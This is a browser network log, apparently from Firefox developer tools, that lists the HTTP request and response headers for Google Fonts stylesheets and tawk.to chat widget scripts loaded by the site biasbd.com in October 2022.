142.250.74.10 200 OK 0 B URL HTTP/2 fonts.googleapis.com/css?family=Montserrat%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
IP 142.250.74.10:0
GET /css?family=Montserrat%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 04 Oct 2022 08:23:56 GMT
date: Tue, 04 Oct 2022 08:23:56 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
embed.tawk.to/5c7ac8afa726ff2eea5a47cb/default
104.22.24.131 200 OK 0 B URL HTTP/2 embed.tawk.to/5c7ac8afa726ff2eea5a47cb/default
IP 104.22.24.131:0
GET /5c7ac8afa726ff2eea5a47cb/default HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/x-javascript
access-control-allow-origin: *
cache-control: public, max-age=7200, s-maxage=3600
etag: W/"stable-v4-63258f417d7"
vary: Accept-Encoding
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84b95f5bb4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=PT+Sans%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
142.250.74.10 200 OK 0 B URL HTTP/2 fonts.googleapis.com/css?family=PT+Sans%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
IP 142.250.74.10:0
GET /css?family=PT+Sans%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 04 Oct 2022 08:23:56 GMT
date: Tue, 04 Oct 2022 08:23:56 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-vendors.js
104.22.24.131 200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-vendors.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-chunk-vendors.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:59 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"81c2642aac0b88b6b237d279f5f8ce67"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c0990bb4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2